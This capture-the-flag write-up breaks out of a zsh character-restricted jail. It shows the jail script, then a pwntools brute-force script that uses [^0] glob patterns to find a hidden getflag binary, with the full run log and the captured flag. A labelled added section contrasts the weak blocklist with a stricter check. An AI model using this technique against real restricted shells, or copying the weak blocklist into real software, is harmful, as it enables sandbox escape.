may your code be under par. execute the getflag binary somewhere in the filesystem to win

nc mc.ax 31774

We're given a zsh script that looks like this:
```zsh
#!/bin/zsh
print -n -P "%F{green}Specify your charset: %f"
read -r charset
# get uniq characters in charset
charset=("${(us..)charset}")
banned=('*' '?' '`')

if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then
    print -P "\n%F{red}That's too easy. Sorry.%f\n"
    exit 1
fi
print -P "\n%F{green}OK! Got $charset.%f"
charset+=($'\n')

# start jail via coproc
coproc zsh -s
exec 3>&p 4<&p

# read chars from fd 4 (jail stdout), print to stdout
while IFS= read -u4 -r -k1 char; do
    print -u1 -n -- "$char"
done &

# read chars from stdin, send to jail stdin if valid
while IFS= read -u0 -r -k1 char; do
    if [[ ! ${#char:|charset} -eq 0 ]]; then
        print -P "\n%F{red}Nope.%f\n"
        exit 1
    fi
    # send to fd 3 (jail stdin)
    print -u3 -n -- "$char"
done
```
We're asked for a "charset" of 6 unique characters, and given a shell where only those characters are allowed. *, ?, and ` are banned.
The key here is that we can use pattern matching with brackets to match characters one at a time. The directory the shell starts in contains

```
/app
|--- run (the jail shell script)
|--- y0u (the directory you want to search in)
```

which are both 3 characters long, so choose the character set .[^0]/ and use 0 and [^0] to distinguish between the two.
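Added example (not part of the original writeup): a Python model of the jail's charset test beside a stricter one, plus a small matcher for literal and [^x] path components run over a constructed directory tree, showing why banning only *, ? and ` still leaves filename generation available. GLOB_META, the function names and TREE are assumptions made for this illustration.

```python
import re

BANNED = set("*?`")                 # the challenge's blocklist
# zsh pattern syntax, including the EXTENDED_GLOB operators (assumed deny set)
GLOB_META = set("*?[]^~#()|<>")

def weak_check(charset: str) -> bool:
    """Mirror of the jail's test: at most 6 unique characters, none banned."""
    uniq = set(charset)
    return len(uniq) <= 6 and not (uniq & BANNED)

def hardened_check(charset: str) -> bool:
    """Same limit, but refuse every character that can form a glob pattern."""
    return weak_check(charset) and not (set(charset) & GLOB_META)

def component_regex(component: str) -> re.Pattern:
    """Translate one path component; only literals and [^x] classes are handled."""
    out, i = [], 0
    while i < len(component):
        if component.startswith("[^", i):
            end = component.index("]", i)
            # A negated class never matches the path separator
            out.append("[^/" + re.escape(component[i + 2:end]) + "]")
            i = end + 1
        else:
            out.append(re.escape(component[i]))
            i += 1
    return re.compile("".join(out))

def expand(pattern: str, paths: list[str]) -> list[str]:
    """Paths whose components match the pattern one for one, as a glob would."""
    want = [component_regex(c) for c in pattern.split("/")]
    hits = []
    for path in paths:
        parts = path.split("/")
        if len(parts) == len(want) and all(r.fullmatch(p) for r, p in zip(want, parts)):
            hits.append(path)
    return hits

# Constructed tree, modelled on the paths visible in the writeup's output
TREE = ["./run", "./y0u", "./y0u/w1ll", "./y0u/w1ll/n3v3r_g3t"]
```

The writeup's charset passes `weak_check` and fails `hardened_check`, and `expand("./[^0]0[^0]", TREE)` singles out `./y0u` using only characters the jail accepted.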
Then, keep adding [^0]s to match characters, checking the return message in the shell to determine when to add a / to move down a directory. Here's a Python script to automate just that:
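```python
import pwn

# The six allowed characters, sent as the charset line
charset = b'.[^0]/\n'
# Starting pattern: two path components already worked out
cmd = './[^0]0[^0]/[^0][^0][^0][^0]/'

while True:
    conn = pwn.remote('mc.ax', 31774)
    conn.recv(numb=27)   # consume the charset prompt
    conn.send(charset)
    conn.recvline()      # skip the blank line
    conn.recvline()      # skip the "OK! Got ..." line

    # Try one more character in the current path component
    cmd += '[^0]'
    conn.send((cmd + '\n').encode())
    ret = conn.recvline().decode('utf8')
    print(ret)

    if ret.startswith('dice'):
        conn.close()
        break
    elif not ret.startswith('zsh: no matches found:'):
        # Any other reply means the pattern matched: descend a level
        cmd += '/'
    conn.close()
```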
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: permission denied: ./y0u/w1ll/n3v3r_g3t
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: permission denied: ./y0u/w1ll/n3v3r_g3t/th1s
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
zsh: no matches found: ./[^0]0[^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0][^0][^0][^0]/[^0][^0][^0][^0]/[^0][^0][^0][^0][^0][^0]
[*] Closed connection to mc.ax port 31774
[x] Opening connection to mc.ax on port 31774
[x] Opening connection to mc.ax on port 31774: Trying 35.243.200.149
[+] Opening connection to mc.ax on port 31774: Done
dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}
[*] Closed connection to mc.ax port 31774